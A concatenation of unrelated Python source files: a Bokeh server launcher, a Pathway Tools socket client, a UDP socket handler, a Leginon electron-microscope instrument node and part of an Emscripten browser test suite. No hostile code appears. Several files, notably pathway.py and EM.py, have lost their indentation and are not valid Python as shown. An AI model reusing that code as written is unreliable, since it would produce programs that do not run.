    doc.theme = Theme(filename=os.path.join(cwd(), 'theme.yaml'))
    return doc.add_root(table)
def bokeh_cdn_resources():
    """Create script to load Bokeh resources from CDN based on
    installed bokeh version.
    Returns:
        script -- script to load resources from CDN
    """
    # the four core BokehJS bundles matching the installed bokeh version
    included_resources = [
        f'bokeh-{bokeh_release_ver}.min.js',
        f'bokeh-api-{bokeh_release_ver}.min.js',
        f'bokeh-tables-{bokeh_release_ver}.min.js',
        f'bokeh-widgets-{bokeh_release_ver}.min.js'
    ]
    resources = '\n    '
    # emit one <script> tag per wanted bundle, with its SRI integrity hash
    for key, value in get_sri_hashes_for_version(bokeh_release_ver).items():
        if key in included_resources:
            resources += '<script type="text/javascript" '
            resources += f'src="{BOKEH_CDN}/{key}" '
            resources += f'integrity="sha384-{value}" '
            resources += 'crossorigin="anonymous"></script>\n    '
    # append the browser-side log-level configuration snippet
    resources += BOKEH_BROWSER_LOGGING
    return resources
def get_sockets():
    """Bind to an OS-assigned free port on all interfaces.

    Returns:
        sockets, port -- sockets and port bind to
    """
    sockets, port = bind_sockets('0.0.0.0', 0)
    # record the chosen port so the flask side can build the bokeh URL
    set_bokeh_port(port)
    return sockets, port
# two applications running in a bokeh server
# Each FunctionHandler wraps a per-session document builder; these shared
# Application instances are routed by BokehTornado inside bk_worker().
_bkapp_blue = Application(FunctionHandler(bkapp_blue))
_bkapp_red = Application(FunctionHandler(bkapp_red))
_bkapp_table = Application(FunctionHandler(bkapp_table))
def bk_worker(sockets, port):
    """ Worker thread to run Bokeh Server """
    # Each worker thread needs its own asyncio event loop for tornado.
    asyncio.set_event_loop(asyncio.new_event_loop())
    # Accept websocket connections originating from both the bokeh server
    # address and the flask front-end address.
    websocket_origins = [f"{BOKEH_ADDR}:{port}", f"{FLASK_ADDR}:{FLASK_PORT}"]
    # use_xheaders/xheaders: honor X-Forwarded-* headers when running
    # behind a reverse proxy.
    bokeh_tornado = BokehTornado({"/bkapp-blue": _bkapp_blue,
                                  "/bkapp-red": _bkapp_red,
                                  "/bkapp-table": _bkapp_table},
                                 extra_websocket_origins=websocket_origins,
                                 **{'use_xheaders': True})
    bokeh_http = HTTPServer(bokeh_tornado, xheaders=True)
    bokeh_http.add_sockets(sockets)
    server = BaseServer(IOLoop.current(), bokeh_tornado, bokeh_http)
    server.start()
    # Blocks this thread forever, serving the three apps.
    server.io_loop.start()
# Script entry point: start the bokeh server in a daemon thread and park the
# main thread so the process stays alive.
if __name__ == '__main__':
    bk_sockets, bk_port = get_sockets()
    t = Thread(target=bk_worker, args=[bk_sockets, bk_port], daemon=True)
    t.start()
    bokeh_url = BOKEH_URL.replace('$PORT', str(bk_port))
    log.info("Bokeh Server App Running at: %s", bokeh_url)
    # IMPROVEMENT: join() blocks without waking 20x/second the way the old
    # `while True: time.sleep(0.05)` spin did; the worker never exits, so
    # this parks the main thread forever just the same.
    t.join()
|
pathway.py | #!/usr/bin/python -w
import socket, re, sys
from os import _exit
import re
from libs.python_modules.utils.sysutil import getstatusoutput
from multiprocessing import Process
import time
class PythonCyc:
_organism = 'meta'
soc = None
    def __init__(self):
        # No setup needed here: the socket is created lazily by makeSocket(),
        # and _organism falls back to the class attribute default 'meta'.
        pass
    def setOrganism(self, organism):
        # Select the Pathway Tools organism database (org-id) used when
        # queries are wrapped by wrap_query().
        self._organism = organism
    def makeSocket(self):
        # Connect to the local Pathway Tools API server on its UNIX domain
        # socket (presumably pathway-tools was started with its API/socket
        # mode enabled -- confirm the expected server setup).
        self.soc = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        self.soc.connect("/tmp/ptools-socket" )
def tokenize(self,string):
LPAREN = '\(';
RPAREN = '\)';
WSPACE = '\s+';
STRING = '\"[^"]*?\"';
PIPES = '\|[^\|]*?\|';
regexp = re.compile(r'' + "(" + LPAREN + "|" + RPAREN + "|" + STRING + "|"+PIPES+ ")" + "|" + WSPACE)
_tokens = [ x.strip() for x in regexp.split(string) if x ]
removePipes = re.compile(r'\|([^|]*)\|')
tokens = []
for _token in _tokens:
tokens.append(re.sub(removePipes, r'', _token) ) #@tokens; ## removes outer pipes from the string.
return tokens;
def parseLisp(self, string):
tokens = self.tokenize(string)
parsed_expr = self.parseExpr(tokens)
return parsed_expr
def parseExpr(self, tokens):
if not tokens:
return []
if tokens[0]== '(':
tokens.pop(0)
list_elements = []
while tokens[0] != ')' :
toAddResult = self.parseExpr(tokens)
if toAddResult:
list_elements.append(toAddResult)
tokens.pop(0)
return list_elements
elif not tokens[0] :
tokens.pop(0)
return []
else :
return tokens.pop(0)
def send_query(self, query):
self.makeSocket()
self.soc.send(query)
def retrieve_results(self):
data = '';
while True:
_data = self.soc.recv(1024)
if not _data:
break
data += _data
return self.parseLisp(data)
def retrieve_results_string(self):
data = '';
results = []
while True:
_data = self.soc.recv(1024)
if not _data:
break
_data = _data.strip()
if _data != None:
results.append(_data)
return ''.join(results)
def getOrganismList(self):
negPatterns = [ re.compile(r'^ECOBASES'), re.compile(r'^[#@]') ]
posPatterns = [ re.compile(r'BASE$') ]
query= "(mapcar #'object-name (all-orgs :all))"
self.send_query(query)
data = self.retrieve_results()
if not data :
return []
organisms = []
for _datum in data:
if not _datum:
continue
datum = _datum.strip()
for patt in negPatterns:
result = patt.search(datum)
if result:
continue
result = posPatterns[0].search(datum)
if not result:
continue
organisms.append(datum)
return organisms
def stopPathwayTools(self):
query= "(exit)"
self.send_query(query)
def wrap_query(self, function ):
lisp = "(with-organism (:org-id\'%s) (mapcar #\'object-name(%s)))"\
%(self._organism, function)
return lisp
def call_func(self, function):
self.send_query(self.wrap_query(function))
result = self.retrieve_results()
return result
def genes_of_pathway(self, pathway, T):
function = "genes-of-pathway \'%s" %(pathway)
result = self.call_func(function)
return result
def genes_of_reaction(self, reaction, T):
function = "genes-of-reaction \'%s" %(reaction)
result = self.call_func(function)
return result
def protectFrameName(self, frame):
pipePatt = re.compile(r'^\|.*\|$') ## if already pipe protected, don't do anything.
status = pipePatt.search(frame)
if status:
return frame
if len(frame.strip())==0:
return "|" + frame + "|"
return frame
def get_slot_values(self, frame, slot_name):
try:
frame = self.protectFrameName(frame)
function = "get-slot-values \'%s \'%s" %(frame, slot_name)
result = self.call_func(function)
return result
except:
print frame, slot_name
_exit(0)
def get_slot_value(self, frame, slot_name):
try:
frame = self.protectFrameName(frame)
function = "get-slot-value \'%s \'%s" %(frame, slot_name)
result = self.call_func_that_returns_string(function)
return result
except:
print frame, slot_name
_exit(0)
def call_func_that_returns_string(self, function):
# use for functions that will return a string and not a list.
# this function doesn't call mapcar and doesn't parse the returned list.
query = "(with-organism (:org-id\'%s) (object-name (%s)))" %(self._organism, function);
self.send_query (query)
result = self.retrieve_results_string()
return result
def startPathwayTools(self):
process = Process(target=startPathwayTools)
process.start()
time.sleep(5)
def startPathwayTools():
    """Blocking launch of the Pathway Tools API server.

    Run in a child process by PythonCyc.startPathwayTools(); blocks for the
    lifetime of the server process.
    """
    getstatusoutput("~/pathway-tools/pathway-tools -api")
if __name__=="__main__":
    # Driver: restart Pathway Tools, walk every pathway in the default
    # database, and print a coverage row per reaction.
    pythonCyc = PythonCyc()
    # a previous server instance may still hold the socket; try to stop it
    try:
        pythonCyc.stopPathwayTools()
    except:
        print "nothing to stop"
    pythonCyc.startPathwayTools()
    print 'connecting'
    my_base_pathways = pythonCyc.call_func("all-pathways :all T")
    pwy_count=0
    # reaction id -> 1 (just seen) or a dict with name/ORFs/covered/num_pwys
    unique_rxns ={}
    for pathway in my_base_pathways:
        pwy_count +=1
        mygenes = pythonCyc.genes_of_pathway(pathway,'T')
        totalrxns = pythonCyc.get_slot_values(pathway, "REACTION-LIST")
        # mark every reaction of this pathway as seen
        for rxn in totalrxns:
            unique_rxns[rxn] = 1
        pathway_common_name = pythonCyc.get_slot_value(pathway,"common-name")
        if not pathway_common_name:
            pathway_common_name = "?"
        num_reactions = len(totalrxns)
        num_predicted_orfs = len(mygenes)
        num_covered_rxns =0
        num_genes =0
        orf_strings = {}
        for reaction in totalrxns :
            # genes attached to this reaction, resolved to common names
            rngenes = pythonCyc.genes_of_reaction(reaction,"T")
            rxngenes = []
            for rngene in rngenes:
                rxngenes.append(pythonCyc.get_slot_value(rngene,"common-name"))
            if rxngenes: #this reaction is covered
                num_covered_rxns+= 1
            rxn_name = pythonCyc.get_slot_value(reaction,"common-name")
            if not rxn_name:
                rxn_name = '???'
            # NOTE(review): this condition is always true (the reaction was
            # inserted into unique_rxns just above), so the record is rebuilt
            # -- and num_pwys reset to 1 -- every time the reaction reappears
            # in another pathway, and the else branch below is unreachable.
            # The intent was probably to expand the record only the first
            # time (e.g. when unique_rxns[reaction] == 1). Confirm.
            if reaction in unique_rxns:
                unique_rxns[reaction]= {}
                unique_rxns[reaction]['name'] = rxn_name
                unique_rxns[reaction]['ORFs'] = rxngenes
                if rxngenes:
                    unique_rxns[reaction]['covered']= 1
                else :
                    unique_rxns[reaction]['covered']= 0
                unique_rxns[reaction]['num_pwys']= 1
            else :
                unique_rxns[reaction]['covered']= 1
                unique_rxns[reaction]['num_pwys']+=1
            num_genes += len(rxngenes);
            for rxngene in rxngenes:
                orf_strings[rxngene] =1
        # done for the reactions in a pathway
        # NOTE(review): outputstr is assembled per pathway but never printed
        # or written anywhere -- confirm whether an output statement was lost.
        outputstr = "PWY:" + "\t" + pathway + "\t" + pathway_common_name\
            + "\t" + str(num_reactions) + "\t" + str(num_covered_rxns) + "\t" + str(num_predicted_orfs)
        for orf_string in orf_strings.keys():
            outputstr += "\t" + orf_string
        outputstr += "\n";
    # printing the reactions: MOST important part of the calculation
    rxnOutputStr="";
    for reaction in unique_rxns.keys():
        # one tab-separated row per reaction: id, name, then its ORFs
        rxnOutputStr = reaction + "\t" + unique_rxns[reaction]['name']
        for orf in unique_rxns[reaction]['ORFs']:
            rxnOutputStr += "\t" + orf
        rxnOutputStr +="\n";
        print rxnOutputStr
    pythonCyc.stopPathwayTools()
|
socketHandler.py | # Source: https://pymotw.com/2/socket/udp.html
"""
This file contains the class SocketHandler, which handles both sending and receiving messages through sockets.
One SocketHandler is needed to handle all connections.
Written by Dorian Wang
"""
import socket
import sys
import time
import json
import threading
import select
import logging
import queue
# https://stackoverflow.com/questions/15727420/using-python-logging-in-multiple-modules
# When run directly, log everything to stdout and take an optional port
# number from the first command-line argument (default 12345).
if __name__ == "__main__":
    logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
    try:
        textport = sys.argv[1]
    except:
        textport = 12345
    # NOTE(review): textport is never referenced again in this file -- dead
    # configuration, or meant to seed addlistener()?  Confirm.
log = logging.getLogger(__name__)
class SocketHandler:
    """Owns a set of UDP listener sockets plus send/receive helpers.

    How to use this object:
    First add listeners to different ports with addlistener(), then call
    run() to start the listener thread.  Send data with socketsender();
    data and host are strings, port is an int.  Received datagrams are
    fetched with getinput(), which returns a (data, sender_address) tuple,
    or None when the input buffer is empty.
    """
    # https://stackoverflow.com/questions/15365406/run-class-methods-in-threads-python
    def __init__(self):
        self.run_thread = True  # cleared to stop the listener thread
        # queue.Queue is already thread-safe; the extra lock is kept for
        # parity with the original design.
        self.inputbuffer = queue.Queue()
        self.inputbufferlock = threading.Lock()
        self.listeners = []  # list of (port, socket) tuples
        self.listenerslock = threading.Lock()
        self.outputbuffer = []
        self.outputbufferlock = threading.Lock()

    def addlistener(self, port):
        """Bind a non-blocking UDP socket on 'port'.

        :return: False when a listener for that port already exists,
                 True after successfully registering the new listener.
        """
        if len(self.listeners) > 0:
            tempports = [listener[0] == port for listener in self.listeners]
            print(tempports)
            if True in tempports:
                return False
        newsocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        server_address = ('', port)  # all interfaces
        newsocket.bind(server_address)
        newsocket.setblocking(0)  # polled via select() in socketlistener
        newlistener = (port, newsocket)
        self.listenerslock.acquire()
        self.listeners.append(newlistener)
        self.listenerslock.release()
        return True

    def removelistener(self, port):
        """Close and remove the listener bound to 'port', if any.

        Bug fix: the original referenced the undefined names 'listenerslock'
        and 'listener' (NameError at runtime), tested a generator expression
        (always truthy), and called shutdown() on an unconnected UDP socket.

        :param port: the port the listener is attached to
        :return: No return
        """
        self.listenerslock.acquire()
        try:
            for listener in self.listeners:
                if listener[0] == port:
                    listener[1].close()
                    self.listeners.remove(listener)
                    break
        finally:
            self.listenerslock.release()

    def socketlistener(self):
        """Thread body: poll all listener sockets and queue incoming datagrams.

        It hopefully doesn't really need to be threaded but I did so anyways.
        """
        while self.run_thread:
            self.listenerslock.acquire()
            templisteners = [listener[1] for listener in self.listeners]
            ready_to_read, ready_to_write, in_error = \
                select.select(templisteners, [], [], 10.0)  # 10 second timeout
            for s in ready_to_read:
                buf, address = s.recvfrom(8192)
                self.inputbufferlock.acquire()
                self.inputbuffer.put_nowait((buf, address))
                log.info("Received %s bytes from %s: " % (len(buf), address))
                self.inputbufferlock.release()
            self.listenerslock.release()
            time.sleep(0.1)

    def socketsender(self, host, port, data):
        """Send 'data' (str) as a single UTF-8 UDP datagram to (host, port).

        :return: None on bad port or empty data, True on success.

        Bug fixes: the socket is now always close()d -- the original called
        shutdown(1) on an unconnected UDP socket (OSError on Linux) and
        leaked the socket on the empty-data path; a duplicated int(port)
        conversion was removed.
        """
        port = int(port)
        if port < 1 or port > 65535:
            log.error("port number out of range in socketsender")
            return None
        target_address = (host, port)
        print(target_address)
        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        try:
            if not len(data):
                return None
            print(s.sendto(data.encode('utf-8'), target_address))
        finally:
            s.close()
        return True

    def getinput(self):
        """Return the oldest (data, address) tuple, or None when empty."""
        if self.inputbuffer.empty():
            return None
        self.inputbufferlock.acquire()
        value = self.inputbuffer.get_nowait()
        self.inputbufferlock.release()
        return value

    def run(self):
        """Start the background listener thread."""
        t = threading.Thread(target=self.socketlistener)
        t.start()
|
EM.py | #
# COPYRIGHT:
# The Leginon software is Copyright 2003
# The Scripps Research Institute, La Jolla, CA
# For terms of the license agreement
# see http://ami.scripps.edu/software/leginon-license
#
from leginon import leginondata
import instrument
import node
import socket
import threading
import gui.wx.Instrument
from pyscope import tem, ccdcamera, registry
import sys
class EM(node.Node):
panelclass = gui.wx.Instrument.Panel
def __init__(self, name, session, managerlocation, tcpport=None, **kwargs):
self.instruments = {}
self.pauses = {
'magnification': 1.5,
'spot size': 0.4,
'image shift': 0.2,
'beam shift': 0.1,
'defocus': 0.4,
'focus': 0.4,
'intensity': 0.1,
'main screen position': 1.0,
}
node.Node.__init__(self, name, session, managerlocation, **kwargs)
# the handler thread waits for queue requests and processes them
# scope and camera are typically COM objects and need to be initialized
# in this thread
self.exitevent = threading.Event()
self.handlerthread = threading.Thread(name='EM handler thread',
target=self.handler)
self.handlerthread.start()
#self.handler()
def exit(self):
node.Node.exit(self)
'''
for i in self.instruments:
try:
i.exit()
except:
pass
'''
self.instruments = {}
self.exitevent.set()
def handler(self):
classes = registry.getClasses()
tems = []
ccdcameras = []
for i in classes:
name, c = i
if issubclass(c, tem.TEM):
tems.append(i)
elif issubclass(c, ccdcamera.CCDCamera):
ccdcameras.append(i)
for name, c in tems + ccdcameras:
if issubclass(c, tem.TEM):
instrumentclass = instrument.TEM
wxaddmethod = self.panel.addTEM
elif issubclass(c, ccdcamera.CCDCamera):
instrumentclass = instrument.CCDCamera
wxaddmethod = self.panel.addCCDCamera
class ObjectClass(c, instrumentclass):
def __init__(self):
self._hostname = socket.gethostname().lower()
c.__init__(self)
instrumentclass.__init__(self)
def getHostname(self):
return self._hostname
def getCs(self):
return self.cs
tries = 3
instance = None
for i in range(1,tries+1):
try:
instance = ObjectClass()
self.instruments[name] = instance
self.objectservice._addObject(name, instance)
self.logger.info('Added interface for %s' % name)
break
except Exception, e:
self.logger.debug('Initialization of %s failed: %s' % (name, e))
continue
if instance is None:
continue
if self.hasMagnifications(name):
self.initializeMagnifications(name)
wxaddmethod(name)
if not self.instruments:
self.logger.warning('No interfaces could be initiailized')
self.start()
# exiting this thread seems to disconnect the COM servers
self.exitevent.wait()
def hasMagnifications(self, name):
try:
instance = self.instruments[name]
except KeyError:
raise ValueError('no instrument %s' % name)
if not hasattr(instance, 'getMagnificationsInitialized'):
return False
if not hasattr(instance, 'setMagnifications'):
return False
return True
def initializeMagnifications(self, name):
try:
instance = self.instruments[name]
except KeyError:
raise ValueError('no instrument %s' % name)
if instance.getMagnificationsInitialized():
return
instrumentdata = leginondata.InstrumentData()
instrumentdata['name'] = name
instrumentdata['hostname'] = instance.getHostname()
queryinstance = leginondata.MagnificationsData()
queryinstance['instrument'] = instrumentdata
try:
result = self.research(queryinstance, results=1)[0]
except IndexError:
self.logger.warning('No magnifications saved for %s' % name)
return
self.setProjectionSubModeMap(instance, result)
instance.setMagnifications(result['magnifications'])
def setProjectionSubModeMap(self, instance, maglistdata):
mode_map = {}
# find
if maglistdata:
mapq = leginondata.ProjectionSubModeMappingData()
mapq['magnification list'] = maglistdata
map_results = mapq.query()
for mapping in map_results:
if mapping['magnification'] not in mode_map.keys():
mode_map[mapping['magnification']] = (mapping['name'], mapping['submode index'])
instance.setProjectionSubModeMap(mode_map)
def getMagnifications(self, name):
try:
instance = self.instruments[name]
except KeyError:
raise ValueError('no instrument %s' % name)
self.logger.info('Getting magnifications from the instrument...')
# This sets both magnifications and projection submode mappings
instance.findMagnifications()
magnificationsdata = self.saveMagnifications(instance,name)
self.saveProjectionSubMap(instance,name,magnificationsdata)
self.panel.onGetMagnificationsDone()
def saveMagnifications(self, instance, tem_name):
self.logger.info('Saving...')
instrumentdata = leginondata.InstrumentData()
instrumentdata['name'] = tem_name
instrumentdata['hostname'] = instance.getHostname()
instrumentdata['cs'] = instance.getCs()
magnificationsdata = leginondata.MagnificationsData()
magnificationsdata['instrument'] = instrumentdata
magnificationsdata['magnifications'] = instance.getMagnifications()
self.publish(magnificationsdata, database=True, dbforce=True)
self.logger.info('Magnifications saved.')
return magnificationsdata
def saveProjectionSubMap(self, instance, tem_name, magnificationsdata):
#Get ProjectionSubModeMapping
try:
mappings = instance.getProjectionSubModeMap()
except KeyError:
raise ValueError('no projection submode mappings %s' % tem_name)
self.logger.info('Saving Projection Submode Mappings...')
for mag in magnificationsdata['magnifications']:
mappingsdata = leginondata.ProjectionSubModeMappingData()
mappingsdata['magnification list'] = magnificationsdata
mappingsdata['magnification'] = mag
mappingsdata['name'] = mappings[mag][0]
mappingsdata['submode index'] = mappings[mag][1]
self.publish(mappingsdata, database=True, dbforce=True)
self.logger.info('Submode mappings saved.')
def resetDefocus(self, name):
self.instruments[name]._execute(self.name, 'resetDefocus', 'method')
def refresh(self, name, attributes):
# hack
self.logger.info('Refreshing parameters for %s...' % name)
try:
instrument = self.instruments[name]
except KeyError:
self.logger.info('Refreshing failed.' % name)
return
values = {}
instrument.lock(self.name)
try:
if isinstance(attributes, list):
for attribute in attributes:
try:
value = instrument._execute(self.name, attribute, 'r')
if isinstance(value, Exception):
raise
else:
values[attribute] = value
except TypeError:
# in theory this is an invalid execution name
pass
except:
self.logger.warning('Failed to refresh attribute \'%s\''
% attribute)
elif isinstance(attributes, dict):
for attribute, value in attributes.items():
try:
value = instrument._execute(self.name, attribute, 'w', (value,))
if isinstance(value, Exception):
raise
else:
values[attribute] = value
value = instrument._execute(self.name, attribute, 'r')
if isinstance(value, Exception):
raise
else:
values[attribute] = value
except TypeError:
# in theory this is an invalid execution name
pass
except AttributeError:
self.logger.warning('Failed to refresh attribute \'%s\''
% attribute)
else:
pass
finally:
instrument.unlock(self.name)
self.panel.setParameters(name, values)
self.logger.info('Refresh completed.')
|
test_browser.py | import BaseHTTPServer, multiprocessing, os, shutil, subprocess, unittest, zlib, webbrowser, time, shlex
from runner import BrowserCore, path_from_root, nonfastcomp
from tools.shared import *
# User can specify an environment variable EMSCRIPTEN_BROWSER to force the browser test suite to
# run using another browser command line than the default system browser.
emscripten_browser = os.environ.get('EMSCRIPTEN_BROWSER')
if emscripten_browser:
    cmd = shlex.split(emscripten_browser)
    def run_in_other_browser(url):
        # launch the configured browser command with the URL appended
        Popen(cmd + [url])
    # monkey-patch webbrowser so every test opens pages in that browser
    webbrowser.open_new = run_in_other_browser
def test_chunked_synchronous_xhr_server(support_byte_ranges, chunkSize, data, checksum):
    """Serve 'data' over HTTP on localhost:11111 for the chunked-XHR test.

    When support_byte_ranges is set, honors 'Range: bytes=a-b' requests;
    otherwise every GET returns the whole payload.  Handles a fixed number
    of requests and then returns.  (chunkSize and checksum are not used
    here; they mirror the client side's parameters.)
    """
    class ChunkedServerHandler(BaseHTTPServer.BaseHTTPRequestHandler):
        # 's' is the handler instance (conventionally named 'self')
        def sendheaders(s, extra=[], length=len(data)):
            s.send_response(200)
            s.send_header("Content-Length", str(length))
            # CORS: allow the test page served from :8888 to read the reply
            s.send_header("Access-Control-Allow-Origin", "http://localhost:8888")
            s.send_header("Access-Control-Expose-Headers", "Content-Length, Accept-Ranges")
            s.send_header("Content-type", "application/octet-stream")
            if support_byte_ranges:
                s.send_header("Accept-Ranges", "bytes")
            for i in extra:
                s.send_header(i[0], i[1])
            s.end_headers()
        def do_HEAD(s):
            s.sendheaders()
        def do_OPTIONS(s):
            # CORS preflight: advertise the Range header, empty body
            s.sendheaders([("Access-Control-Allow-Headers", "Range")], 0)
        def do_GET(s):
            if not support_byte_ranges:
                s.sendheaders()
                s.wfile.write(data)
            else:
                # parse 'Range: bytes=start-end' and clamp end to the data
                (start, end) = s.headers.get("range").split("=")[1].split("-")
                start = int(start)
                end = int(end)
                end = min(len(data)-1, end)
                length = end-start+1
                s.sendheaders([], length)
                s.wfile.write(data[start:end+1])
            s.wfile.close()
    # serve the number of requests the client is expected to make, then return
    expectedConns = 11
    httpd = BaseHTTPServer.HTTPServer(('localhost', 11111), ChunkedServerHandler)
    for i in range(expectedConns+1):
        httpd.handle_request()
class browser(BrowserCore):
@classmethod
def setUpClass(self):
    # One-time notice: these tests open real browser windows and popups.
    super(browser, self).setUpClass()
    print
    print 'Running the browser tests. Make sure the browser allows popups from localhost.'
    print
def test_sdl1(self):
    """SDL hello world renders correctly, with and without explicit USE_SDL=1."""
    src, ref = 'hello_world_sdl.cpp', 'htmltest.png'
    self.btest(src, reference=ref)
    # USE_SDL=1 is the default anyhow; verify passing it explicitly too
    self.btest(src, reference=ref, args=['-s', 'USE_SDL=1'])
def test_html_source_map(self):
    """Check that -g4 emits a .map file the browser dev tools can consume."""
    cpp_file = os.path.join(self.get_dir(), 'src.cpp')
    html_file = os.path.join(self.get_dir(), 'src.html')
    # browsers will try to 'guess' the corresponding original line if a
    # generated line is unmapped, so if we want to make sure that our
    # numbering is correct, we need to provide a couple of 'possible wrong
    # answers'. thus, we add some printf calls so that the cpp file gets
    # multiple mapped lines. in other words, if the program consists of a
    # single 'throw' statement, browsers may just map any thrown exception to
    # that line, because it will be the only mapped line.
    with open(cpp_file, 'w') as f:
        f.write(r'''
#include <cstdio>
int main() {
printf("Starting test\n");
try {
throw 42; // line 8
} catch (int e) { }
printf("done\n");
return 0;
}
''')
    # use relative paths when calling emcc, because file:// URIs can only load
    # sourceContent when the maps are relative paths
    try_delete(html_file)
    try_delete(html_file + '.map')
    Popen([PYTHON, EMCC, 'src.cpp', '-o', 'src.html', '-g4'],
        cwd=self.get_dir()).communicate()
    assert os.path.exists(html_file)
    assert os.path.exists(html_file + '.map')
    # this part is interactive: open the page and let a human inspect it
    webbrowser.open_new('file://' + html_file)
    time.sleep(1)
    print '''
If manually bisecting:
  Check that you see src.cpp among the page sources.
  Even better, add a breakpoint, e.g. on the printf, then reload, then step through and see the print (best to run with EM_SAVE_DIR=1 for the reload).
'''
def test_emscripten_log(self):
    """Build the emscripten_log test with source-map support and expect result 1."""
    test_source = open(path_from_root('tests', 'emscripten_log', 'emscripten_log.cpp')).read()
    src = os.path.join(self.get_dir(), 'src.cpp')
    open(src, 'w').write(self.with_report_result(test_source))
    build_cmd = [PYTHON, EMCC, src,
                 '--pre-js', path_from_root('src', 'emscripten-source-map.min.js'),
                 '-g', '-o', 'page.html']
    Popen(build_cmd).communicate()
    self.run_browser('page.html', None, '/report_result?1')
def build_native_lzma(self):
    """Build the native lzma helper once; no-op if the binary already exists."""
    native_bin = path_from_root('third_party', 'lzma.js', 'lzma-native')
    if os.path.isfile(native_bin) and os.access(native_bin, os.X_OK):
        return
    previous_dir = os.getcwd()
    try:
        os.chdir(path_from_root('third_party', 'lzma.js'))
        # On Windows prefer using MinGW make if it exists, otherwise fall
        # back to hoping we have cygwin make.
        use_mingw = WINDOWS and Building.which('mingw32-make')
        build_cmd = ['doit.bat'] if use_mingw else ['sh', './doit.sh']
        Popen(build_cmd).communicate()
    finally:
        os.chdir(previous_dir)
def test_split(self):
    """--split mode: emit main/functions/include files, embed them in a
    hand-written harness page, and verify the rendering in a browser."""
    def nfc():
        # test HTML generation.
        self.reftest(path_from_root('tests', 'htmltest.png'))
        output = Popen([PYTHON, EMCC, path_from_root('tests', 'hello_world_sdl.cpp'), '-o', 'something.js', '--split', '100', '--pre-js', 'reftest.js']).communicate()
        assert os.path.exists(os.path.join(self.get_dir(), 'something.js')), 'must be main js file'
        assert os.path.exists(os.path.join(self.get_dir(), 'something_functions.js')), 'must be functions js file'
        assert os.path.exists(os.path.join(self.get_dir(), 'something.include.html')), 'must be js include file'
        # harness page: standard emscripten shell HTML with the generated
        # include file spliced in before </body>
        open(os.path.join(self.get_dir(), 'something.html'), 'w').write('''
<!doctype html>
<html lang="en-us">
<head>
<meta charset="utf-8">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Emscripten-Generated Code</title>
<style>
.emscripten { padding-right: 0; margin-left: auto; margin-right: auto; display: block; }
canvas.emscripten { border: 1px solid black; }
textarea.emscripten { font-family: monospace; width: 80%; }
div.emscripten { text-align: center; }
</style>
</head>
<body>
<hr/>
<div class="emscripten" id="status">Downloading...</div>
<div class="emscripten">
<progress value="0" max="100" id="progress" hidden=1></progress>
</div>
<canvas class="emscripten" id="canvas" oncontextmenu="event.preventDefault()"></canvas>
<hr/>
<div class="emscripten"><input type="button" value="fullscreen" onclick="Module.requestFullScreen()"></div>
<hr/>
<textarea class="emscripten" id="output" rows="8"></textarea>
<hr>
<script type='text/javascript'>
// connect to canvas
var Module = {
preRun: [],
postRun: [],
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
// These replacements are necessary if you render to raw HTML
//text = text.replace(/&/g, "&");
//text = text.replace(/</g, "<");
//text = text.replace(/>/g, ">");
//text = text.replace('\\n', '<br>', 'g');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})(),
printErr: function(text) {
if (0) { // XXX disabled for safety typeof dump == 'function') {
dump(text + '\\n'); // fast, straight to the real console
} else {
console.log(text);
}
},
canvas: document.getElementById('canvas'),
setStatus: function(text) {
if (Module.setStatus.interval) clearInterval(Module.setStatus.interval);
var m = text.match(/([^(]+)\((\d+(\.\d+)?)\/(\d+)\)/);
var statusElement = document.getElementById('status');
var progressElement = document.getElementById('progress');
if (m) {
text = m[1];
progressElement.value = parseInt(m[2])*100;
progressElement.max = parseInt(m[4])*100;
progressElement.hidden = false;
} else {
progressElement.value = null;
progressElement.max = null;
progressElement.hidden = true;
}
statusElement.innerHTML = text;
},
totalDependencies: 0,
monitorRunDependencies: function(left) {
this.totalDependencies = Math.max(this.totalDependencies, left);
Module.setStatus(left ? 'Preparing... (' + (this.totalDependencies-left) + '/' + this.totalDependencies + ')' : 'All downloads complete.');
}
};
Module.setStatus('Downloading...');
</script>''' + open(os.path.join(self.get_dir(), 'something.include.html')).read() + '''
</body>
</html>
''')
        self.run_browser('something.html', 'You should see "hello, world!" and a colored cube.', '/report_result?0')
    # this feature only exists in the non-fastcomp backend
    nonfastcomp(nfc)
def test_split_in_source_filenames(self):
    """--split with -g: the functions file is named after the source file
    (something/hello_world_sdl.cpp.js) instead of something_functions.js."""
    def nfc():
        self.reftest(path_from_root('tests', 'htmltest.png'))
        output = Popen([PYTHON, EMCC, path_from_root('tests', 'hello_world_sdl.cpp'), '-o', 'something.js', '-g', '--split', '100', '--pre-js', 'reftest.js']).communicate()
        assert os.path.exists(os.path.join(self.get_dir(), 'something.js')), 'must be main js file'
        assert os.path.exists(os.path.join(self.get_dir(), 'something', 'hello_world_sdl.cpp.js')), 'must be functions js file'
        assert os.path.exists(os.path.join(self.get_dir(), 'something.include.html')), 'must be js include file'
        # same harness page as test_split, with the include file spliced in
        open(os.path.join(self.get_dir(), 'something.html'), 'w').write('''
<!doctype html>
<html lang="en-us">
<head>
<meta charset="utf-8">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Emscripten-Generated Code</title>
<style>
.emscripten { padding-right: 0; margin-left: auto; margin-right: auto; display: block; }
canvas.emscripten { border: 1px solid black; }
textarea.emscripten { font-family: monospace; width: 80%; }
div.emscripten { text-align: center; }
</style>
</head>
<body>
<hr/>
<div class="emscripten" id="status">Downloading...</div>
<div class="emscripten">
<progress value="0" max="100" id="progress" hidden=1></progress>
</div>
<canvas class="emscripten" id="canvas" oncontextmenu="event.preventDefault()"></canvas>
<hr/>
<div class="emscripten"><input type="button" value="fullscreen" onclick="Module.requestFullScreen()"></div>
<hr/>
<textarea class="emscripten" id="output" rows="8"></textarea>
<hr>
<script type='text/javascript'>
// connect to canvas
var Module = {
preRun: [],
postRun: [],
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
// These replacements are necessary if you render to raw HTML
//text = text.replace(/&/g, "&");
//text = text.replace(/</g, "<");
//text = text.replace(/>/g, ">");
//text = text.replace('\\n', '<br>', 'g');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})(),
